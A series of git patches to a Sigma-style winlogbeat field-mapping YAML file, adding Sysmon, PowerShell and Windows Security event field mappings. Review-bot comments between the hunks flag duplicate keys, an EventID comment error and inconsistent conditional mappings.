@@ -220,32 +171,23 @@ fieldmappings: CallerProcessName: winlog.event_data.CallerProcessName ClassName: winlog.event_data.ClassName ClassId: winlog.event_data.ClassId - Company: winlog.event_data.Company DestAddress: winlog.event_data.DestAddress Destination: process.executable - DestinationIsIpv6: winlog.event_data.DestinationIsIpv6 DestPort: destination.port - Device: file.path DeviceDescription: winlog.event_data.DeviceDescription # DeviceName => Microsoft-Windows-Ntfs EventID: 98 DeviceName: winlog.event_data.DeviceName # ErrorCode => printservice-admin EventID: 4909 or 808 ErrorCode: winlog.event_data.ErrorCode FilePath: winlog.event_data.FilePath - FileVersion: winlog.event_data.FileVersion # Filename => product: antivirus Filename: winlog.event_data.Filename - Initiated: winlog.event_data.Initiated - IntegrityLevel: winlog.event_data.IntegrityLevel LayerRTID: winlog.event_data.LayerRTID LDAPDisplayName: winlog.event_data.LDAPDisplayName # Level => Source: MSExchange Control Panel EventID: 4 Level: winlog.event_data.Level - LogonId: winlog.event_data.LogonId - NewName: winlog.event_data.NewName NewValue: winlog.event_data.NewValue ObjectServer: winlog.event_data.ObjectServer - OriginalFileName: process.pe.original_file_name PasswordLastSet: winlog.event_data.PasswordLastSet PrivilegeList: winlog.event_data.PrivilegeList QueryName: dns.question.name @@ -256,11 +198,8 @@ fieldmappings: Service: winlog.event_data.Service ServicePrincipalNames: winlog.event_data.ServicePrincipalNames SidHistory: winlog.event_data.SidHistory - Signed: winlog.event_data.Signed SourceAddress: source.ip - StartFunction: winlog.event_data.StartFunction SubjectLogonId: winlog.event_data.SubjectLogonId - TargetFileName: file.path TargetProcessAddress: winlog.event_data.TargetProcessAddress TargetServerName: winglog.event_data.TargetServerName TargetLogonId: winlog.event_data.TargetLogonId 
@@ -268,6 +207,104 @@ fieldmappings: # UserName => smbclient-security eventid:31017 UserName: winlog.event_data.UserName Workstation: winlog.event_data.Workstation + # + # Sysmon/Operational up to ID 25 + # + RuleName: winlog.event_data.RuleName + ProcessGuid: process.entity_id + ProcessId: process.pid + Image: process.executable + FileVersion: + category=process_creation: process.pe.file_version + category=image_load: process.pe.file_version + default: winlog.event_data.FileVersion + Description: + category=process_creation: process.pe.description + category=image_load: process.pe.description + category=sysmon_error: winlog.event_data.Description + default: winlog.event_data.Description + Product: + category=process_creation: process.pe.product + category=image_load: process.pe.product + default: winlog.event_data.Product + Company: + category=process_creation: process.pe.company + category=image_load: process.pe.company + default: winlog.event_data.Company + OriginalFileName: process.pe.original_file_name + CommandLine: + category=process_creation: process.command_line + service=powershell-classic: powershell.command.value + default: winlog.event_data.CommandLine + CurrentDirectory: process.working_directory + LogonGuid: winlog.event_data.LogonGuid + LogonId: winlog.event_data.LogonId + TerminalSessionId: winlog.event_data.TerminalSessionId + IntegrityLevel: winlog.event_data.IntegrityLevel + ParentProcessGuid: process.parent.entity_id + ParentProcessId: process.parent.pid + ParentImage: process.parent.executable + ParentCommandLine: process.parent.command_line + TargetFilename: file.path + CreationUtcTime: winlog.event_data.CreationUtcTime + PreviousCreationUtcTime: winlog.event_data.PreviousCreationUtcTime + Protocol: network.transport + Initiated: + category=network_connection: network.direction + default: winlog.event_data.Initiated + #SourceIsIpv6: winlog.event_data.SourceIsIpv6 #=gets deleted and not 
boolean...https://github.com/elastic/beats/blob/71eee76e7cfb8d5b18dfacad64864370ddb14ce7/x-pack/winlogbeat/module/sysmon/config/winlogbeat-sysmon.js#L278-L279 + SourceIp: source.ip + SourceHostname: source.domain + SourcePort: source.port + SourcePortName: winlog.event_data.SourcePortName + #DestinationIsIpv6: winlog.event_data.DestinationIsIpv6 #=gets deleted and not boolean...https://github.com/elastic/beats/blob/71eee76e7cfb8d5b18dfacad64864370ddb14ce7/x-pack/winlogbeat/module/sysmon/config/winlogbeat-sysmon.js#L278-L279 + DestinationIp: destination.ip + DestinationHostname: destination.domain + DestinationPort: destination.port + DestinationPortName: network.protocol + State: winlog.event_data.State + Version: winlog.event_data.Version + SchemaVersion: winlog.event_data.SchemaVersion + ImageLoaded: file.path + Signed: file.code_signature.signed + Signature: file.code_signature.subject_name + SignatureStatus: file.code_signature.status + SourceProcessGuid: process.entity_id + SourceProcessId: process.pid + SourceImage: process.executable + TargetProcessGuid: winlog.event_data.TargetProcessGuid + TargetProcessId: winlog.event_data.TargetProcessId + TargetImage: winlog.event_data.TargetImage + NewThreadId: winlog.event_data.NewThreadId + StartAddress: winlog.event_data.StartAddress + StartModule: winlog.event_data.StartModule + StartFunction: winlog.event_data.StartFunction + Device: file.path + SourceThreadId: process.thread.id + GrantedAccess: winlog.event_data.GrantedAccess + CallTrace: winlog.event_data.CallTrace + TargetObject: registry.path + Details: winlog.event_data.Details + NewName: winlog.event_data.NewName + Configuration: winlog.event_data.Configuration + ConfigurationFileHash: winlog.event_data.ConfigurationFileHash + PipeName: file.name + User: winlog.event_data.User + EventNamespace: winlog.event_data.EventNamespace + Name: winlog.event_data.Name + Query: winlog.event_data.Query + Operation: winlog.event_data.Operation + Type: 
winlog.event_data.Type + Destination: process.executable + Consumer: winlog.event_data.Consumer + Filter: winlog.event_data.Filter + QueryName: dns.question.name + QueryStatus: sysmon.dns.status + QueryResults: winlog.event_data.QueryResults + IsExecutable: sysmon.file.is_executable + Archived: sysmon.file.archived + Session: winlog.event_data.Session + ClientInfo: winlog.event_data.ClientInfo # SYSMON Hashes Hashes: winlog.event_data.Hashes # extraction from Hashes NOT a original field but find in some rule 
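Review bot: The new Sysmon block re-adds keys that already exist earlier in the same `fieldmappings` mapping — `Destination: process.executable` and `QueryName: dns.question.name` are both still present as context in the previous hunks of this commit (`@@ -220,32 +171,23 @@` and `@@ -256,11 +198,8 @@`), and `QueryStatus`/`QueryResults` may be duplicated as well (the earlier part of the mapping is not fully in view). YAML loaders such as PyYAML keep the last duplicate key silently, so the earlier entries become dead and any later divergence between the two copies goes unnoticed; the earlier definitions should be removed in the same commit that moves them here. The `Description:` entry also lists `category=sysmon_error: winlog.event_data.Description`, which is identical to its `default:` and can be dropped.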
@@ -287,10 +324,42 @@ fieldmappings: category=driver_load: hash.imphash category=image_load: file.hash.imphash default: process.pe.imphash - #security 7045 - ServiceName: - service=security: winlog.event_data.ServiceName - default: service.name + # + # Powershell + # + CommandName: powershell.command.name + CommandPath: powershell.command.path + CommandType: powershell.command.type + EngineVersion: + service=powershell-classic: powershell.engine.version + default: winlog.event_data.EngineVersion + HostApplication: process.command_line + HostId: process.entity_id + HostName: process.title + HostVersion: + service=powershell-classic: powershell.process.executable_version + default: winlog.event_data.HostVersion + NewEngineState: powershell.engine.new_state + PipelineId: powershell.pipeline_id + PreviousEngineState: powershell.engine.previous_state + RunspaceId: powershell.runspace_id + ScriptName: file.path + SequenceNumber: event.sequence + NewProviderState: powershell.provider.new_state + ProviderName: powershell.provider.name + Payload: winlog.event_data.Payload + ContextInfo: winlog.event_data.ContextInfo + MessageNumber: powershell.sequence + MessageTotal: powershell.total + ScriptBlockText: powershell.file.script_block_text + ScriptBlockId: powershell.file.script_block_id + # + # Security + # + #EventID 7045 + ServiceName: + service=security: service.name + default: winlog.event_data.ServiceName ImagePath: winlog.event_data.ImagePath ServiceType: winlog.event_data.ServiceType StartType: winlog.event_data.ServiceStartType From ac43eecc3634585e002b113493d455cdd9e1c1dc Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 5 Aug 2021 11:20:22 +0200 Subject: [PATCH 0177/1367] Add eventid 4624 --- tools/config/winlogbeat-modules-enabled.yml | 52 +++++++++++++-------- 1 file changed, 33 insertions(+), 19 deletions(-) diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index 9a6ba374..64ad4fcd 100644 
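Review bot: The `ServiceName` entry sits under the new `# Security #` header annotated `#EventID 7045`, but 7045 (a service was installed) is written to the System channel by Service Control Manager; the Security-channel equivalent is 4697. The comment should read `#EventID 4697 (Security); 7045 is logged in the System channel`, otherwise a maintainer may assume the `service=security` branch covers 7045. The hunk also inverts the previous mapping so that `service=security` now yields `service.name` and everything else `winlog.event_data.ServiceName`; that looks plausible for winlogbeat's security module handling of 4697, but it reverses prior behavior for System-channel rules and deserves a sentence in the commit message or a comment next to the entry.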
--- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -107,24 +107,18 @@ defaultindex: winlogbeat-* # Keep EventID! Clean up the list afterwards! fieldmappings: EventID: event.code + Channel: winlog.channel AccessMask: winlog.event_data.AccessMask AccountName: winlog.event_data.AccountName AllowedToDelegateTo: winlog.event_data.AllowedToDelegateTo AttributeLDAPDisplayName: winlog.event_data.AttributeLDAPDisplayName AuditPolicyChanges: winlog.event_data.AuditPolicyChanges - AuthenticationPackageName: winlog.event_data.AuthenticationPackageName CallingProcessName: winlog.event_data.CallingProcessName - Channel: winlog.channel ComputerName: winlog.ComputerName EventType: winlog.event_data.EventType FailureCode: winlog.event_data.FailureCode FileName: file.path HiveName: winlog.event_data.HiveName - IpAddress: source.ip - IpPort: source.port - KeyLength: winlog.event_data.KeyLength - LogonProcessName: winlog.event_data.LogonProcessName - LogonType: winlog.event_data.LogonType NewProcessName: winlog.event_data.NewProcessName ObjectClass: winlog.event_data.ObjectClass ObjectName: winlog.event_data.ObjectName 
@@ -133,22 +127,17 @@ fieldmappings: ParentProcessName: process.parent.name Path: winlog.event_data.Path ProcessCommandLine: winlog.event_data.ProcessCommandLine - ProcessName: process.executable Properties: winlog.event_data.Properties SecurityID: winlog.event_data.SecurityID ServiceFileName: winlog.event_data.ServiceFileName ShareName: winlog.event_data.ShareName Source: winlog.event_data.Source Status: winlog.event_data.Status - SubjectDomainName: user.domain - SubjectUserName: user.name - SubjectUserSid: user.id TicketEncryptionType: winlog.event_data.TicketEncryptionType TicketOptions: winlog.event_data.TicketOptions TargetDomainName: user.domain TargetUserName: user.name TargetUserSid: user.id - WorkstationName: source.domain # Channel: WLAN-Autoconfig AND EventID: 8001 AuthenticationAlgorithm: winlog.event_data.AuthenticationAlgorithm BSSID: winlog.event_data.BSSID @@ -167,12 +156,10 @@ fieldmappings: AccessList: winlog.event_data.AccessList AttributeValue: winlog.event_data.AttributeValue AuditSourceName: winlog.event_data.AuditSourceName - AuthenticationPackage: winlog.event_data.AuthenticationPackageName CallerProcessName: winlog.event_data.CallerProcessName ClassName: winlog.event_data.ClassName ClassId: winlog.event_data.ClassId DestAddress: winlog.event_data.DestAddress - Destination: process.executable DestPort: destination.port DeviceDescription: winlog.event_data.DeviceDescription # DeviceName => Microsoft-Windows-Ntfs EventID: 98 
@@ -190,19 +177,14 @@ fieldmappings: ObjectServer: winlog.event_data.ObjectServer PasswordLastSet: winlog.event_data.PasswordLastSet PrivilegeList: winlog.event_data.PrivilegeList - QueryName: dns.question.name - QueryResults: winlog.event_data.QueryResults - QueryStatus: sysmon.dns.status RelativeTargetName: winlog.event_data.RelativeTargetName SamAccountName: winlog.event_data.SamAccountName Service: winlog.event_data.Service ServicePrincipalNames: winlog.event_data.ServicePrincipalNames SidHistory: winlog.event_data.SidHistory SourceAddress: source.ip - SubjectLogonId: winlog.event_data.SubjectLogonId TargetProcessAddress: winlog.event_data.TargetProcessAddress TargetServerName: winglog.event_data.TargetServerName - TargetLogonId: winlog.event_data.TargetLogonId TaskName: winlog.event_data.TaskName # UserName => smbclient-security eventid:31017 UserName: winlog.event_data.UserName 
@@ -356,6 +338,38 @@ fieldmappings: # # Security # + SubjectUserSid: user.id + SubjectUserName: user.name + SubjectDomainName: user.domain + SubjectLogonId: + service=security: winlog.logon.id + default: winlog.event_data.SubjectLogonId + #EventID 4610 + AuthenticationPackageName: winlog.event_data.AuthenticationPackageName + #EventID 4611 + LogonProcessName: winlog.event_data.LogonProcessName + #EventID 4616 + PreviousTime: winlog.event_data.PreviousTime + NewTime: winlog.event_data.NewTime + #EventID 4624 + TargetLogonId: + service=security: winlog.logon.id + default: winlog.event_data.TargetLogonId + LogonType: winlog.event_data.LogonType + WorkstationName: source.domain + TransmittedServices: winlog.event_data.TransmittedServices + LmPackageName: winlog.event_data.LmPackageName + KeyLength: winlog.event_data.KeyLength + ProcessName: process.executable + IpAddress: source.ip + IpPort: source.port + ImpersonationLevel: winlog.event_data.ImpersonationLevel + RestrictedAdminMode: winlog.event_data.RestrictedAdminMode + TargetOutboundUserName: winlog.event_data.TargetOutboundUserName + TargetOutboundDomainName: winlog.event_data.TargetOutboundDomainName + VirtualAccount: winlog.event_data.VirtualAccount + TargetLinkedLogonId: winlog.event_data.TargetLinkedLogonId + ElevatedToken: winlog.event_data.ElevatedToken #EventID 7045 ServiceName: service=security: service.name From 439b3cecc3f61a169fff277355a18fee0ebe4278 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 5 Aug 2021 13:31:39 +0200 Subject: [PATCH 0178/1367] Add most of security EventID --- tools/config/winlogbeat-modules-enabled.yml | 250 ++++++++++++++------ 1 file changed, 180 insertions(+), 70 deletions(-) diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index 64ad4fcd..8fd145f2 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml 
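Review bot: Both `SubjectLogonId` and `TargetLogonId` are mapped to `winlog.logon.id` when `service=security`, so rules that reference either field on an event carrying both (4624 has a subject and a target logon ID) now query the same ECS field and can no longer distinguish them. Unless winlogbeat's security module is known to populate `winlog.logon.id` from the field a given rule intends per event ID, keep one of them on the raw field, e.g. change the `service=security:` branch of `TargetLogonId` to `winlog.event_data.TargetLogonId`, or add a comment stating which logon ID `winlog.logon.id` carries for which events. The `#EventID 4624` header is followed by fields such as `ProcessName` and `IpAddress` that many other Security events also use; a short note that these headers are indicative rather than restrictive would prevent misreading them.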
@@ -108,36 +108,16 @@ defaultindex: winlogbeat-* fieldmappings: EventID: event.code Channel: winlog.channel - AccessMask: winlog.event_data.AccessMask - AccountName: winlog.event_data.AccountName - AllowedToDelegateTo: winlog.event_data.AllowedToDelegateTo - AttributeLDAPDisplayName: winlog.event_data.AttributeLDAPDisplayName - AuditPolicyChanges: winlog.event_data.AuditPolicyChanges CallingProcessName: winlog.event_data.CallingProcessName ComputerName: winlog.ComputerName EventType: winlog.event_data.EventType FailureCode: winlog.event_data.FailureCode FileName: file.path HiveName: winlog.event_data.HiveName - NewProcessName: winlog.event_data.NewProcessName - ObjectClass: winlog.event_data.ObjectClass - ObjectName: winlog.event_data.ObjectName - ObjectType: winlog.event_data.ObjectType - ObjectValueName: winlog.event_data.ObjectValueName - ParentProcessName: process.parent.name Path: winlog.event_data.Path ProcessCommandLine: winlog.event_data.ProcessCommandLine - Properties: winlog.event_data.Properties SecurityID: winlog.event_data.SecurityID - ServiceFileName: winlog.event_data.ServiceFileName - ShareName: winlog.event_data.ShareName Source: winlog.event_data.Source - Status: winlog.event_data.Status - TicketEncryptionType: winlog.event_data.TicketEncryptionType - TicketOptions: winlog.event_data.TicketOptions - TargetDomainName: user.domain - TargetUserName: user.name - TargetUserSid: user.id # Channel: WLAN-Autoconfig AND EventID: 8001 AuthenticationAlgorithm: winlog.event_data.AuthenticationAlgorithm BSSID: winlog.event_data.BSSID 
@@ -151,16 +131,9 @@ fieldmappings: PHYType: winlog.event_data.PHYType ProfileName: winlog.event_data.ProfileName SSID: winlog.event_data.SSID - # from here missing field at 20210706 Accesses: winlog.event_data.Accesses - AccessList: winlog.event_data.AccessList - AttributeValue: winlog.event_data.AttributeValue - AuditSourceName: winlog.event_data.AuditSourceName - CallerProcessName: winlog.event_data.CallerProcessName ClassName: winlog.event_data.ClassName ClassId: winlog.event_data.ClassId - DestAddress: winlog.event_data.DestAddress - DestPort: destination.port DeviceDescription: winlog.event_data.DeviceDescription # DeviceName => Microsoft-Windows-Ntfs EventID: 98 DeviceName: winlog.event_data.DeviceName @@ -169,26 +142,12 @@ fieldmappings: FilePath: winlog.event_data.FilePath # Filename => product: antivirus Filename: winlog.event_data.Filename - LayerRTID: winlog.event_data.LayerRTID LDAPDisplayName: winlog.event_data.LDAPDisplayName # Level => Source: MSExchange Control Panel EventID: 4 Level: winlog.event_data.Level - NewValue: winlog.event_data.NewValue - ObjectServer: winlog.event_data.ObjectServer - PasswordLastSet: winlog.event_data.PasswordLastSet - PrivilegeList: winlog.event_data.PrivilegeList - RelativeTargetName: winlog.event_data.RelativeTargetName - SamAccountName: winlog.event_data.SamAccountName - Service: winlog.event_data.Service - ServicePrincipalNames: winlog.event_data.ServicePrincipalNames - SidHistory: winlog.event_data.SidHistory - SourceAddress: source.ip TargetProcessAddress: winlog.event_data.TargetProcessAddress - TargetServerName: winglog.event_data.TargetServerName - TaskName: winlog.event_data.TaskName # UserName => smbclient-security eventid:31017 UserName: winlog.event_data.UserName - Workstation: winlog.event_data.Workstation # # Sysmon/Operational up to ID 25 # 
@@ -216,6 +175,7 @@ fieldmappings: OriginalFileName: process.pe.original_file_name CommandLine: category=process_creation: process.command_line + service=security: process.command_line service=powershell-classic: powershell.command.value default: winlog.event_data.CommandLine CurrentDirectory: process.working_directory @@ -230,7 +190,9 @@ fieldmappings: TargetFilename: file.path CreationUtcTime: winlog.event_data.CreationUtcTime PreviousCreationUtcTime: winlog.event_data.PreviousCreationUtcTime - Protocol: network.transport + Protocol: + category=network_connection: network.transport + default: winlog.event_data.Protocol Initiated: category=network_connection: network.direction default: winlog.event_data.Initiated 
@@ -338,42 +300,190 @@ fieldmappings: # # Security # - SubjectUserSid: user.id - SubjectUserName: user.name - SubjectDomainName: user.domain + AccessGranted: winlog.event_data.AccessGranted + AccessList: winlog.event_data.AccessList + AccessMask: winlog.event_data.AccessMask + AccessReason: winlog.event_data.AccessReason + AccessRemoved: winlog.event_data.AccessRemoved + AccountDomain: user.domain + AccountExpires: winlog.event_data.AccountExpires + AccountName: user.name + AdditionalInfo: winlog.event_data.AdditionalInfo + AdditionalInfo2: winlog.event_data.AdditionalInfo2 + AllowedToDelegateTo: winlog.event_data.AllowedToDelegateTo + AppCorrelationID: winlog.event_data.AppCorrelationID + Application: process.executable + AttributeLDAPDisplayName: winlog.event_data.AttributeLDAPDisplayName + AttributeSyntaxOID: winlog.event_data.AttributeSyntaxOID + AttributeValue: winlog.event_data.AttributeValue + AuditPolicyChanges: winlog.event_data.AuditPolicyChanges + AuditSourceName: winlog.event_data.AuditSourceName + AuthenticationPackageName: winlog.event_data.AuthenticationPackageName + CallerProcessId: winlog.event_data.CallerProcessId + CallerProcessName: winlog.event_data.CallerProcessName + CategoryId: winlog.event_data.CategoryId + CertIssuerName: winlog.event_data.CertIssuerName + CertSerialNumber: winlog.event_data.CertSerialNumber + CertThumbprint: winlog.event_data.CertThumbprint + ClientAddress: source.ip + ClientName: source.domain + ClientProcessId: winlog.event_data.ClientProcessId + ClientProcessStartKey: winlog.event_data.ClientProcessStartKey + ComputerAccountChange: winlog.event_data.ComputerAccountChange + CrashOnAuditFailValue: winlog.event_data.CrashOnAuditFailValue + DestAddress: destination.ip + DestPort: destination.port + Direction: winlog.event_data.Direction + DisplayName: winlog.event_data.DisplayName + DnsHostName: winlog.event_data.DnsHostName + DomainBehaviorVersion: winlog.event_data.DomainBehaviorVersion + DomainName: 
winlog.event_data.DomainName + DomainPolicyChanged: winlog.event_data.DomainPolicyChanged + DomainSid: winlog.event_data.DomainSid + DSName: winlog.event_data.DSName + DSType: winlog.event_data.DSType + Dummy: winlog.event_data.Dummy + ElevatedToken: winlog.event_data.ElevatedToken + EventSourceId: winlog.event_data.EventSourceId + FailureReason: winlog.event_data.FailureReason + FilterRTID: winlog.event_data.FilterRTID + ForceLogoff: winlog.event_data.ForceLogoff + FQDN: winlog.event_data.FQDN + GroupTypeChange: winlog.event_data.GroupTypeChange + HandleId: winlog.event_data.HandleId + HomeDirectory: winlog.event_data.HomeDirectory + HomePath: winlog.event_data.HomePath + ImagePath: winlog.event_data.ImagePath + ImpersonationLevel: winlog.event_data.ImpersonationLevel + IpAddress: source.ip + IpPort: source.port + KeyLength: winlog.event_data.KeyLength + LayerName: winlog.event_data.LayerName + LayerRTID: winlog.event_data.LayerRTID + LmPackageName: winlog.event_data.LmPackageName + LockoutDuration: winlog.event_data.LockoutDuration + LockoutObservationWindow: winlog.event_data.LockoutObservationWindow + LockoutThreshold: winlog.event_data.LockoutThreshold + LogonHours: winlog.event_data.LogonHours SubjectLogonId: service=security: winlog.logon.id default: winlog.event_data.SubjectLogonId - #EventID 4610 - AuthenticationPackageName: winlog.event_data.AuthenticationPackageName - #EventID 4611 LogonProcessName: winlog.event_data.LogonProcessName - #EventID 4616 - PreviousTime: winlog.event_data.PreviousTime - NewTime: winlog.event_data.NewTime - #EventID 4624 - TargetLogonId: - service=security: winlog.logon.id - default: winlog.event_data.TargetLogonId LogonType: winlog.event_data.LogonType - WorkstationName: source.domain - TransmittedServices: winlog.event_data.TransmittedServices - LmPackageName: winlog.event_data.LmPackageName - KeyLength: winlog.event_data.KeyLength + MachineAccountQuota: winlog.event_data.MachineAccountQuota + MandatoryLabel: 
winlog.event_data.MandatoryLabel + MasterKeyId: winlog.event_data.MasterKeyId + MaxPasswordAge: winlog.event_data.MaxPasswordAge + MemberName: winlog.event_data.MemberName + MemberSid: winlog.event_data.MemberSid + MinPasswordAge: winlog.event_data.MinPasswordAge + MinPasswordLength: winlog.event_data.MinPasswordLength + MixedDomainMode: winlog.event_data.MixedDomainMode + NewProcessId: process.pid + NewProcessName: process.executable + NewSd: winlog.event_data.NewSd + NewTargetUserName: winlog.event_data.NewTargetUserName + NewTime: winlog.event_data.NewTime + NewUacValue: winlog.event_data.NewUacValue + NewValue: winlog.event_data.NewValue + NewValueType: winlog.event_data.NewValueType + ObjectClass: winlog.event_data.ObjectClass + ObjectDN: winlog.event_data.ObjectDN + ObjectGUID: winlog.event_data.ObjectGUID + ObjectName: winlog.event_data.ObjectName + ObjectServer: winlog.event_data.ObjectServer + ObjectType: winlog.event_data.ObjectType + ObjectValueName: winlog.event_data.ObjectValueName + OemInformation: winlog.event_data.OemInformation + OldSd: winlog.event_data.OldSd + OldTargetUserName: winlog.event_data.OldTargetUserName + OldUacValue: winlog.event_data.OldUacValue + OldValue: winlog.event_data.OldValue + OldValueType: winlog.event_data.OldValueType + OpCorrelationID: winlog.event_data.OpCorrelationID + OperationType: winlog.event_data.OperationType + PackageName: winlog.event_data.PackageName + ParentProcessName: process.parent.name + PasswordHistoryLength: winlog.event_data.PasswordHistoryLength + PasswordLastSet: winlog.event_data.PasswordLastSet + PasswordProperties: winlog.event_data.PasswordProperties + PreAuthType: winlog.event_data.PreAuthType + PreviousTime: winlog.event_data.PreviousTime + PrimaryGroupId: winlog.event_data.PrimaryGroupId + PrivilegeList: winlog.event_data.PrivilegeList ProcessName: process.executable - IpAddress: source.ip - IpPort: source.port - ImpersonationLevel: winlog.event_data.ImpersonationLevel + ProfilePath: 
winlog.event_data.ProfilePath + Properties: winlog.event_data.Properties + PuaCount: winlog.event_data.PuaCount + PuaPolicyId: winlog.event_data.PuaPolicyId + RecoveryKeyId: winlog.event_data.RecoveryKeyId + RecoveryServer: winlog.event_data.RecoveryServer + RelativeTargetName: winlog.event_data.RelativeTargetName + RemoteMachineID: winlog.event_data.RemoteMachineID + RemoteUserID: winlog.event_data.RemoteUserID + ResourceAttributes: winlog.event_data.ResourceAttributes RestrictedAdminMode: winlog.event_data.RestrictedAdminMode - TargetOutboundUserName: winlog.event_data.TargetOutboundUserName - TargetOutboundDomainName: winlog.event_data.TargetOutboundDomainName - VirtualAccount: winlog.event_data.VirtualAccount - TargetLinkedLogonId: winlog.event_data.TargetLinkedLogonId - ElevatedToken: winlog.event_data.ElevatedToken - #EventID 7045 + RestrictedSidCount: winlog.event_data.RestrictedSidCount + RpcCallClientLocality: winlog.event_data.RpcCallClientLocality + SamAccountName: winlog.event_data.SamAccountName + ScriptPath: winlog.event_data.ScriptPath + Service: winlog.event_data.Service + ServiceAccount: winlog.event_data.ServiceAccount + ServiceFileName: winlog.event_data.ServiceFileName ServiceName: service=security: service.name default: winlog.event_data.ServiceName - ImagePath: winlog.event_data.ImagePath + ServicePrincipalNames: winlog.event_data.ServicePrincipalNames + ServiceSid: winlog.event_data.ServiceSid + ServiceStartType: winlog.event_data.ServiceStartType ServiceType: winlog.event_data.ServiceType - StartType: winlog.event_data.ServiceStartType + SessionId: winlog.event_data.SessionId + SessionName: winlog.event_data.SessionName + ShareLocalPath: winlog.event_data.ShareLocalPath + ShareName: winlog.event_data.ShareName + SidHistory: winlog.event_data.SidHistory + SidList: winlog.event_data.SidList + SourceAddress: source.ip + Status: winlog.event_data.Status + StartType: winlog.event_data.StartType + SubcategoryGuid: winlog.event_data.SubcategoryGuid 
+ SubcategoryId: winlog.event_data.SubcategoryId + SubjectDomainName: + service=security: user.domain + default: winlog.event_data.SubjectDomainName + SubjectUserName: + service=security: user.name + default: winlog.event_data.SubjectUserName + SubjectUserSid: + service=security: user.id + default: winlog.event_data.SubjectUserSid + SubStatus: winlog.event_data.SubStatus + TargetDomainName: user.domain + TargetLinkedLogonId: winlog.event_data.TargetLinkedLogonId + TargetLogonId: + service=security: winlog.logon.id + default: winlog.event_data.TargetLogonId + TargetOutboundDomainName: winlog.event_data.TargetOutboundDomainName + TargetOutboundUserName: winlog.event_data.TargetOutboundUserName + TargetServerName: winlog.event_data.TargetServerName + TargetSid: winlog.event_data.TargetSid + TargetUserName: + service=security:user.name + default: winlog.event_data.TargetUserName + TargetUserSid: + service=security:user.id + default: winlog.event_data.TargetUserSid + TaskContent: winlog.event_data.TaskContent + TaskName: winlog.event_data.TaskName + TicketEncryptionType: winlog.event_data.TicketEncryptionType + TicketOptions: winlog.event_data.TicketOptions + TokenElevationType: winlog.event_data.TokenElevationType + TransactionId: winlog.event_data.TransactionId + TransmittedServices: winlog.event_data.TransmittedServices + UserAccountControl: winlog.event_data.UserAccountControl + UserParameters: winlog.event_data.UserParameters + UserPrincipalName: winlog.event_data.UserPrincipalName + UserWorkstations: winlog.event_data.UserWorkstations + VirtualAccount: winlog.event_data.VirtualAccount + Workstation: winlog.event_data.Workstation + WorkstationName: source.domain From 0b053e79ccd48cb33169d3cf95e066c9efe8e16c Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 5 Aug 2021 13:33:39 +0200 Subject: [PATCH 0179/1367] fix syntax error --- tools/config/winlogbeat-modules-enabled.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
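Review bot: The rewritten Security section applies ECS mappings with two different conventions: `SubjectUserName`, `SubjectDomainName`, `SubjectUserSid`, `TargetLogonId`, `TargetUserName`, `TargetUserSid` and `ServiceName` are guarded by `service=security:` with a `winlog.event_data.*` `default:`, while `AccountName: user.name`, `AccountDomain: user.domain`, `TargetDomainName: user.domain`, `ClientAddress: source.ip`, `IpAddress: source.ip`, `SourceAddress: source.ip`, `DestAddress: destination.ip`, `NewProcessName: process.executable`, `Application: process.executable` and `WorkstationName: source.domain` are unconditional. `DestAddress` in particular changes in this same commit from `winlog.event_data.DestAddress` (removed in the earlier `@@ -151,16 +131,9 @@` hunk) to the unconditional ECS field, so a rule on a non-Security logsource that uses this name is redirected to a field the module may not populate for that channel. Using the guarded form consistently, e.g. `DestAddress:` / `service=security: destination.ip` / `default: winlog.event_data.DestAddress`, keeps the fallback intact; which names winlogbeat actually normalises per event ID is not visible here and should be checked against the module's ingest pipelines.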
diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index 8fd145f2..ff1cfa43 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -468,7 +468,7 @@ fieldmappings: TargetServerName: winlog.event_data.TargetServerName TargetSid: winlog.event_data.TargetSid TargetUserName: - service=security:user.name + service=security: user.name default: winlog.event_data.TargetUserName TargetUserSid: service=security:user.id From 4b44ee654b450c1c41410e89edcaebfa4906e4bc Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 5 Aug 2021 13:36:18 +0200 Subject: [PATCH 0180/1367] Fix missing a space --- tools/config/winlogbeat-modules-enabled.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index ff1cfa43..3173527a 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -460,18 +460,18 @@ fieldmappings: SubStatus: winlog.event_data.SubStatus TargetDomainName: user.domain TargetLinkedLogonId: winlog.event_data.TargetLinkedLogonId - TargetLogonId: + TargetLogonId: service=security: winlog.logon.id default: winlog.event_data.TargetLogonId TargetOutboundDomainName: winlog.event_data.TargetOutboundDomainName TargetOutboundUserName: winlog.event_data.TargetOutboundUserName TargetServerName: winlog.event_data.TargetServerName TargetSid: winlog.event_data.TargetSid - TargetUserName: + TargetUserName: service=security: user.name default: winlog.event_data.TargetUserName - TargetUserSid: - service=security:user.id + TargetUserSid: + service=security: user.id default: winlog.event_data.TargetUserSid TaskContent: winlog.event_data.TaskContent TaskName: winlog.event_data.TaskName From b1fb462c39ddce4925088fef1eac2723f8e49c88 Mon Sep 17 00:00:00 2001 
